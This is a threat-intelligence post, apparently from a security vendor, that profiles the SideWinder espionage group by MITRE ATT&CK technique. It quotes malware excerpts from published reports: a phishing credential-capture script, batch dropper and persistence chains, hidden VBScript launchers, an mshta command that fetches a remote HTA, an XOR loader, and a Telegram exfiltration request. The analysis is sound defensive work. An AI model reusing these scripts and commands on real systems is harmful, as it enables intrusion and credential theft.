LAST UPDATED ON DECEMBER 17, 2025

SideWinder Threat Group: Maritime and Nuclear Sectors at Risk with Updated Toolset

SideWinder is a long-running cyber-espionage group active since at least 2012, consistently refining its targeting and operational scale. Over the years, the group has expanded from focused regional intrusions to wide-ranging campaigns across Asia, Africa, and parts of Europe. Major events include its public naming in 2018, COVID-19–themed operations in 2020, expansive multi-country campaigns between 2021 and 2024, and the continued broadening of its geographic and sectoral focus, particularly toward government, military, financial, maritime, logistics, and nuclear-related entities.

SideWinder’s TTPs center on highly tailored spearphishing for initial access, using malicious files, links, and credential-harvesting pages. Execution typically relies on Windows scripting environments such as cmd.exe, VBA, VBScript, and mshta-based HTA delivery. Persistence is maintained through scheduled tasks and autostart scripts, while privilege escalation leverages UAC bypass techniques. The group employs extensive defense evasion techniques, which include obfuscation, masquerading, artifact cleanup, and DLL side-loading, alongside robust credential-theft capabilities targeting RDP, Windows credential stores, and browser data. Its collection methods include harvesting documents, system information, and browser tokens, while C2 operations rely on rotating server lists, encrypted channels, and occasional web-service, based exfiltration.

In this post, we will review SideWinder’s major historical operations, highlight its expansive targeting across government, military, financial, and critical-infrastructure sectors, and examine the group’s tactics, techniques, and procedures to understand how it conducts methodical, multi-stage cyber-espionage campaigns. In the end, we will show how Picus helps defend against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the SideWinder Group?

2012 (at least) – The threat group begins activity, specializing in cyberespionage [1].
12 April 2018 – Kaspersky publicly names the SideWinder APT group for the first time in an APT Trends summary [2].
2020 – The group capitalizes on global events by launching campaigns utilizing a COVID-19 theme to lure victims, notably targeting Pakistani Government Officials [3].
June – November 2021 – SideWinder conducts a systematic and expansive campaign targeting over 60 entities across South and East Asia, including governments, military organizations, central banks, and media in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka [1].
2024 – The group broadens its geographic operations across numerous regions, including Africa, Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, the Philippines, Sri Lanka, the UAE, Vietnam, and global diplomatic entities, while shifting its sector focus toward maritime infrastructure, logistics companies, and nuclear power facilities in South Asia [4].

Which MITRE ATT&CK Techniques Are Used by SideWinder?

Tactic: Initial Access

T1204.002 User Execution: Malicious File

The attack chain is dependent on the victim running a malicious file. In some attack chains, a ZIP archive is delivered containing a malicious LNK (shortcut) file. Upon execution, this LNK file runs code to fetch the next-stage HTA payload from an attacker-controlled server [2].

T1566.001 Phishing: Spearphishing Attachment

The group's principal infiltration vector is spearphishing emails carrying malicious attachments. While RTF (Rich Text Format) files are common, other formats like DOCX, LNK, and ZIP files are also employed.

One observed example targeted Pakistani government offices with a malicious .docx file, using a lure related to police procedures [2].

From: SSP INT LCTD SINDH
Sent: 4/23/2019 6:14 AM
To: <Redacted>
Subject: Fwd: STANDING OPERATING PROCEDURES FOR POLICE EMERGENCY THREAT LEVELS AND COLOR CODES FOR OPERATIONAL READINESS.
Attachments: STANDING OPERATING PROCEDURES FOR POLICE EMERGENCY THREAT LEVELS AND COLOR CODES FOR OPERATIONAL READINESS.docx

T1566.002 Phishing: Spearphishing Link

Beyond attachments, the threat actor also utilizes spearphishing links to direct victims to malicious destinations. These links often lead to credential harvesting sites, which are sophisticated phishing pages impersonating legitimate login portals for services like the Zimbra web client, the Central Bank of Myanmar, and the Nucleus Vision crypto platform.

A backend login.php script is used to capture credentials. This script is configured to harvest the victim's username, password, IP address, access time, and User-Agent, inserting them into a MySQL database [1]. A significant attributional clue is the script's hardcoded timezone setting of Asia/kolkata, which is set before recording the access time.

<?php
// SQL insertion logic from Central Bank of Myanmar phish
$sql = "INSERT INTO target.dca_mm (username,
password, ipaddress,accesstime, signature) VALUES ('$username',
'$password', '$ip', '$accesstime', '$useragent')";

// Timezone setting used in the script date_default_timezone_set('Asia/kolkata');

$accesstime = date('d-m-Y H:i:s");

// SQL insertion logic from Nucleus Vision crypto phish

$sql = "INSERT INTO vision.nucleus (username, password, ipaddress, accesstime, signature) VALUES ('$username', '$password', '$ip', '$accesstime', '$useragent')"; ?>

Tactic: Execution

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows Command Shell (cmd.exe) is a fundamental component for orchestrating the infection. Malicious macros and HTA files frequently drop and execute batch scripts (often named a.bat). These scripts manage various actions, including creating persistence via scheduled tasks, running payloads, and cleaning up forensic evidence [1].

schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR
"%APPDATA%\WindowsSecurity.exe" /F
timeout 3
del /f "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
invisible.vbs"

A more complex, multi-stage "dropper" script has also been observed. Its sole function is to use echo commands to write a series of other batch files (b.bat, c.bat, d.bat, e.bat) and VBScripts to the disk. This chain is responsible for downloading, decoding (using certutil), creating persistence (using schtasks), and finally deleting all operational artifacts [1].

echo off
>>"%LOCALAPPDATA%\\b.bat" (
echo echo off
echo wscript.exe "%LOCALAPPDATA%\\downfile.vbs"
echo "%LOCALAPPDATA%\\stealthex.vbs" "%LOCALAPPDATA%\\c.bat"
)
>>"%LOCALAPPDATA%\\c.bat" (
echo echo off
echo certutil /decode "%LOCALAPPDATA%\\microsoft\\cloudstatus.txt"
"%LOCALAPPDATA%\\cloudAP.exe"
echo "%LOCALAPPDATA%\\stealthex.vbs" "%LOCALAPPDATA%\\d.bat"
echo attrib +h "%LOCALAPPDATA%\cloudAP.exe"
)
>>"%LOCALAPPDATA%\\d.bat" (
echo echo off
echo schtasks /create /SC minute /MO 10 /TN CloudAPIManager /TR
"%LOCALAPPDATA%\\cloudAP.exe" /F
echo "%LOCALAPPDATA%\\stealthex.vbs" "%LOCALAPPDATA%\\e.bat"
)
>>"%LOCALAPPDATA%\\e.bat" (
echo del "%LOCALAPPDATA%\\b.bat"
echo del "%LOCALAPPDATA%\\c.bat"
echo del "%LOCALAPPDATA%\\d.bat"
echo del "%LOCALAPPDATA%\\microsoft\\cloudstatus.txt"
echo del "%LOCALAPPDATA%\\e.bat"
)
attrib +h "%LOCALAPPDATA%\\a.bat"
attrib +h "%LOCALAPPDATA%\\stealthex.vbs"
attrib +h "%LOCALAPPDATA%\\downfile.vbs"
"%LOCALAPPDATA%\\stealthex.vbs" "%LOCALAPPDATA%\\b.bat"

T1059.005 Command and Scripting Interpreter: Visual Basic

VBA macros (like the "Gohra" macro) embedded in Office documents are used to decode and drop payloads. The payload (e.g., a ZIP file) is stored as a long, delimited string within a form element (UserForm1.TextBox1.Text). The macro reconstructs the malicious file by splitting this string by its delimiter (e.g., "-") and converting each part into a byte [1].

Dim btsGohra7(361128) As Byte
arlGohra = Split(UserForm1.TextBox1.Text, "-")
For Each vl In arlGohra
btsGohra7(linGohra) = CByte(vl)
linGohra = linGohra + 1
Next

VBScript files, often executed by the batch scripts, serve as stealthy launchers and persistence mechanisms.

This script launches two other scripts, invisible2.vbs and a.bat, in hidden windows (argument 0) [1].

CreateObject("Wscript.Shell").Run "%APPDATA%\invisible2.vbs", 0,
False
GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B").Run
"%APPDATA%\a.bat", 0, False

This script's function is to extract the contents of the WindowsSecurity.zip archive using the Shell Application COM object [1].

Set oApp =
GetObject("new:13709620-C279-11CE-A49E-444553540000")
oApp.Namespace("%APPDATA%").CopyHere
oApp.Namespace("%APPDATA%\WindowsSecurity.zip").items

This script is used for persistence. It is placed in the Startup folder, sleeps for 5 minutes (300000 milliseconds), and then launches the main batch script (a.bat) in a hidden window [1].

WScript.Sleep 300000
CreateObject("Wscript.Shell").Run Chr(34) &
"%APPDATA%\Local\\a.bat" & Chr(34), 0, False

A generic runner script that executes its first command-line argument (WScript.Arguments(0)) in a hidden window [1].

CreateObject("Wscript.Shell").Run Chr(34) &
WScript.Arguments(0) & Chr(34), 0, False

T1106 Native API

The malware employs direct Windows API calls to execute shellcode. For instance, one stager allocates a new memory buffer using VirtualAlloc, copies its shellcode into this buffer, and then passes execution to it by calling CreateThread [1].

T1203 Exploitation for Client Execution

The group is known to exploit CVE-2017-11882, a memory corruption vulnerability in the Microsoft Office Equation Editor. This flaw is used to gain code execution from malicious RTF files [2].

T1218.005 System Binary Proxy Execution: Mshta

A core execution technique involves using mshta.exe, a legitimate and signed Microsoft utility. This binary is used to download and run remote HTA (HTML Application) files or JavaScript [1]. This action is typically initiated when a user clicks a malicious LNK file or via shellcode from an RTF exploit.

Link Target: C:\Windows\System32\mshta.exe
Command Line Arguments: http://185[.]163[.]47[.]226/$/nepal/npa.hta

Tactic: Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

The primary persistence mechanism on Windows is the use of Scheduled Tasks. Batch scripts run during infection leverage schtasks.exe to create new tasks. These tasks are configured to re-execute the main payload at frequent intervals, such as every 2 or 10 minutes, or daily at a set time [1].

# Runs every 2 minutes, named WindowSecurityPatch
schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR "%APPDATA%\WindowsSecurity.exe" /F

# Runs every 10 minutes, named CloudAPIManager
schtasks /create /SC minute /MO 10 /TN CloudAPIManager /TR "%LOCALAPPDATA%\cloudAP.exe" /F

# Runs daily at 11:00 AM, named WindowsUpdate
schtasks /create /sc daily /tn WindowsUpdate /tr %tmp%/WindowsUpdate.exe /st 11:00 /f

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

In some infection chains, the inevitable.vbs script is dropped into the user's Startup folder [1]. This ensures the script is automatically run every time the user logs in.

Tactic: Privilege Escalation

T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control

The malware attempts to bypass User Account Control (UAC) using techniques selected based on the security products installed on the system. The default method abuses the CMSTP (Windows Connection Manager Profile Installer) program. This technique involves passing a custom profile to the legitimate CMSTP executable to run arbitrary commands with elevated privileges.

This default bypass is used unless Kaspersky or 360 Total Security products are detected. If those security solutions are present, the malware switches to a different UAC bypass that abuses the "IElevatedFactoryServer" COM object. In this scenario, shellcode is injected into explorer.exe. This shellcode loads a malicious library (from a resource named "COMUacBypass"), which uses the COM object to register a new, high-privilege Windows task. This task is then used to run the payload with elevated permissions [5].

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

To hinder static analysis, some payloads (like SideWinder.ReverseShell.e, and the Chisel tool) are packed using UPX [1].

T1036.004 Masquerading: Masquerade Task or Service

Persistence-related scheduled tasks are given common, system-related names to appear legitimate, such as WindowSecurityPatch, CloudAPIManager, WindowsUpdate, and WindowHost.

T1036.005 Masquerading: Match Legitimate Resource Name or Location

Payloads are given names like WindowsSecurity.exe to mimic benign Windows components.

T1036.007 Masquerading: Double File Extension

Malicious LNK files are disguised using double file extensions, such as .pdf.lnk or .doc.lnk, to trick users into believing they are simple documents.

T1070.004 Indicator Removal: File Deletion

The multi-stage batch scripts are designed for self-cleanup. For example, the final e.bat script in one chain is tasked with deleting all previous batch scripts (b.bat, c.bat, d.bat) and the downloaded encoded payload (cloudstatus.txt) after the final executable is active and persisted.

T1140 Deobfuscate/Decode Files or Information

The group employs several methods to decode payloads on the victim's machine. The legitimate Windows utility certutil.exe is used to Base64-decode payloads downloaded to disk (e.g., hello.txt, cloudstatus.txt) [1].

cmd.exe /c certutil -decode %tmp%/hello.txt %tmp%/scvhost.exe & %tmp%/ scvhost.exe

certutil /decode "%LOCALAPPDATA%\microsoft\cloudstatus.txt" "%LOCALAPPDATA%\cloudAP.exe"

Various custom XOR decryption schemes are also used [1], [5].

C2 traffic for one RAT is encrypted with a 3-byte XOR key: "NPA".
The "StealerBot" implant is decrypted using its first 32 bytes as a rolling XOR key.
Shellcode from the RTF exploit decrypts a JavaScript payload using a static 0x12 XOR key.

T1564.001 Hide Artifacts: Hidden Files and Directories

Malicious files and directories are hidden. One HTA downloader creates the %userprofile%\windowshost directory with both "hidden" and "system" attributes. The batch scripts also use the attrib +h command to hide payloads and themselves from user view [1].

T1574.001 Hijack Execution Flow: DLL

DLL side-loading is a key technique for both execution and evasion. An HTA script first copies a legitimate, signed executable (e.g., rekeywiz.exe) to a new directory. It then drops a malicious loader DLL into the same directory but renames it to match a legitimate DLL that the executable tries to load (e.g., Duser.dll).

A configuration file (rekeywiz.exe.config) is also dropped to prevent .NET versioning issues. When the legitimate rekeywiz.exe is run, the Windows loader finds and loads the malicious Duser.dll first. This loader DLL then reads, decrypts, and loads the final implant (e.g., MpyutHk.tmp) from disk into memory.

rekeywiz.exe.config file forces the legitimate executable to use .NET runtimes compatible with the malicious DLL.

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup useLegacyV2RuntimeActivationPolicy="true">
<supportedRuntime version="v2.0.50727"/>
<supportedRuntime version="v4.0"/>
</startup>
</configuration>

This code shows the loader reading the encrypted implant, using the first 32 bytes as a rolling XOR key, and loading the decrypted assembly [2].

static Program()
{
// Read the encrypted implant file (e.g., "MpyutHk.tmp>")
byte[] assemblyData = Program.GetAssemblyData("MpyutHk.tmp");

// Create a new byte array for the payload (total size minus 32-byte key)
byte[] array = new byte[assemblyData.Length - 32];

// Copy the encrypted payload (bytes 32+) into the new array

Program.BufferCopy_1(ref assemblyData, 32, ref array, array.Length);

// Loop through the payload bytes

for (int i = 0; i < array.Length; i++) {
// Decrypt the byte using the 32-byte key (rolling XOR)
byte[] array2 = array;
int num = i;
array2[num] ^= assemblyData[i % 32];
}

// Load the decrypted payload (now a.NET assembly) into memory
Program._assembly = Program.LoadAssembly(array);
}

Tactic: Credential Access

T1056.004 Input Capture: Credential API Hooking

The "StealerBot" implant includes an advanced RDP credential stealer. It monitors for the mstsc.exe (RDP client) process. When launched, shellcode is injected into the process. This shellcode loads a malicious C++ library that uses the Microsoft Detours package to hook three functions within SspiCli.dll:

SspiPrepareForCredRead (to get the server name)
CryptProtectMemory (to get the cleartext password)
CredIsMarshaledCredentialW (to get the username)

Stolen credentials are sent back to the main implant via a named pipe: c63hh148d7c9437caa0f5850256ad32c [5].

Another StealerBot module targets Windows credentials. It injects shellcode into explorer.exe, loading credsphisher.dll. This DLL calls the CredUIPromptForWindowsCredentialsW API, which displays a legitimate-looking native Windows prompt. It validates the entered credentials using LogonUserW. If valid, they are exfiltrated via a named pipe (a21hg56ue2c2365cba1g9840256ad31c). If invalid, the prompt is shown again in a loop until correct credentials are provided [5].

T1539 Steal Web Session Cookie

A .NET "StealerBot Token Grabber" module is designed to steal cookies and authentication tokens from high-value services like Facebook, LinkedIn, and Google (Gmail, Google Drive). It achieves this by dropping its own legitimate dependencies (e.g., Newtonsoft.Json.dll, System.Data.SQLite.dll) to parse the browser's cookie database and exfiltrate the tokens [5].

T1555.003 Credentials from Password Stores: Credentials from Web Browsers

A C# tool, originally named ChromeRecovery.exe, is used to extract authentication data from a wide variety of web browsers, including "Chrome", "Opera", "Yandex", "Brave Browser", "Vivaldi", and "Edge Chromium". The collected data (URL, username, password, and application) is saved to %TEMP%\windowslogs.txt [1].

Tactic: Discovery

T1016 System Network Configuration Discovery

A Python-based stealer (SideWinder.StealerPy) gathers the victim's local and external IP addresses. The external IP is identified by making a request to the public service http://ip.42.pl/raw [1].

T1083 File and Directory Discovery

One stealer variant searches the user's Desktop, Downloads, and Documents folders for files with specific extensions: .txt, .docx, .pdf, .xlsx, .pptx, .snt, .jpg, and .png. It also obtains a full list of all files and directories on the Desktop.

Tactic: Collection

T1005 Data from Local System

Malware is programmed to collect files from the local system. The SideWinder.StealerPy not only collects documents but also reads the first 200 characters of .txt files, likely for quick data triage [1].

The "StealerBot" implant gathers extensive system information using WMI queries and formats it into a JSON file for exfiltration. Collected data includes user accounts, computer system details (model, manufacturer, RAM), installed antivirus products, running processes, and detailed network interface information [2].

jsonWriter.WritePropertyName("sysInfo");
jsonWriter.WriteStartObject();

jsonWriter.WritePropertyName("userAccount"); SysInfo.WriteWmi(jsonWriter, "Win32_userAccount", "root\cimv2", new string { "name" });
jsonWriter.WritePropertyName("computerSystem"); SysInfo.WriteWmi(jsonWriter, "Win32_computerSystem", "root\cimv2", new string { "Caption", "UserName", "Manufacturer", "Model", "PrimaryOwnerName", "TotalPhysicalMemory" });
jsonWriter.WritePropertyName("antiVirusProduct"); SysInfo.WriteWmi(jsonWriter, "antiVirusProduct", "root\SecurityCenter2", new string { "displayName", "ProductState", "TimeStamp" });
jsonWriter.WritePropertyName("process");

SysInfo.WriteWmi(jsonWriter, "Win32_process", "root\cimv2", new string { "Name", "CommandLine", "ProcessOwner" });
jsonWriter.WritePropertyName("network");

//... code loops through NetworkInterface.GetAllNetworkInterfaces() // to collect MAC, IP, Type, Speed, IsDhcpEnabled, etc.

Tactic: Command and Control

T1008 Fallback Channels

One of the RATs contains a hardcoded list of C2 server addresses. It randomly selects a server from this list upon execution. If the connection fails, it iterates to the next server, providing resilience against C2 takedowns [1].

C2 Server List
httр://microsoft-patches[.]servehttp[.]com/
httр://webmail[.]gavaf[.]org/
httр://webmail-org[.]servehttp[.]com/
httр://outlook[.]gavaf[.]org/
httр://mail[.]gavaf[.]org/
httр://srilankanairlines[.]redirectme[.]net/
httр://expolanka[.]serveftp[.]com/
httр://lankabelltd[.]myftp[.]org/
httр://sltelecom[.]servehttp[.]com/
httр://sltmobitel[.]hopto[.]org/
httр://bankofceylon[.]sytes[.]net/

T1102 Web Service

One RAT variant uses the Telegram Bot API for exfiltration, sending a GET request with Base64-encoded data [1].

GET REQUEST TO https://api[.]telegram[.]org/bot[token]/sendMessage?chat_id=[id]&text=[base64_data]

T1572 Protocol Tunneling

The Chisel tool, a Go-based utility for network traffic tunneling, has been utilized. The PE32 executable, packed with UPX, was observed connecting to a hardcoded server (microsoft-winupdate[.]servehttp[.]com:8443) and listening on local port 45689 for inbound connections [1].

T1573.001 Encrypted Channel: Symmetric Cryptography

C2 communications are not sent in clear text. One RAT uses a custom, multi-layer obfuscation scheme designed to evade network signatures. The data is first Base64 encoded, then XOR-encrypted with the 3-byte key "NPA", and finally Base64 encoded two more times [1].

How Picus Simulates SideWinder Attacks?

We also strongly suggest simulating SideWinder Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for SideWinder:

Threat ID	Threat Name	Attack Module
90234	Sidewinder Threat Group Campaign Malware Downloader Email Threat	Network Infiltration
50150	Sidewinder Threat Group Campaign Malware Downloader Download Threat	Network Infiltration
29210	Sidewinder Threat Group Campaign Malware Download Threat	Network Infiltration
20419	Sidewinder Threat Group Campaign Malware Email Threat	Network Infiltration
73639	Sidewinder Threat Group Campaign Malware Email Threat	Network Infiltration
45965	Sidewinder Threat Group Campaign Malware Download Threat	Network Infiltration
75691	SideWinder Threat Group Campaign	Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the SideWinder Group?

SideWinder is also known as: T-APT-04, Rattlesnake, Razor Tiger, APT-C-17, Hardcore Nationalist, HN2, APT-Q-39, BabyElephant, GroupA21.

Key Takeaways

SideWinder is a long-running cyber espionage group active since at least 2012, with steadily expanding global targeting.
Initial access relies heavily on spearphishing attachments, links, and malicious scripting environments.
Persistence, execution, and privilege escalation are driven by scheduled tasks, autostart scripts, UAC bypasses, and multi-stage script chains.
Defense evasion includes obfuscation, hidden files, DLL side loading, and extensive cleanup routines.
Credential theft targets RDP, Windows credential stores, and browser data using advanced hooking and token-grabbing tools.
Command and control uses rotating servers, encrypted channels, web service-based exfiltration, and tunneling utilities.

References

[1] “OLD SNAKE, NEW SKIN.” Accessed: Nov. 16, 2025. [Online]. Available: https://go.group-ib.com/report-sidewinder-2023

[2] “A global perspective of the SideWinder APT.” Accessed: Nov. 16, 2025. [Online]. Available: https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

[3] “Sidewinder APT Group Campaign Analysis,” Rewterz - Revolutionizing Cybersecurity. Accessed: Nov. 16, 2025. [Online]. Available: https://rewterz.com/threats/sidewinder-apt-group-campaign-analysis

[4] G. Dedola, “SideWinder targets the maritime and nuclear sectors with an updated toolset,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/

[5] G. Dedola, “Beyond the Surface: the evolution and expansion of the SideWinder APT group,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt/114089/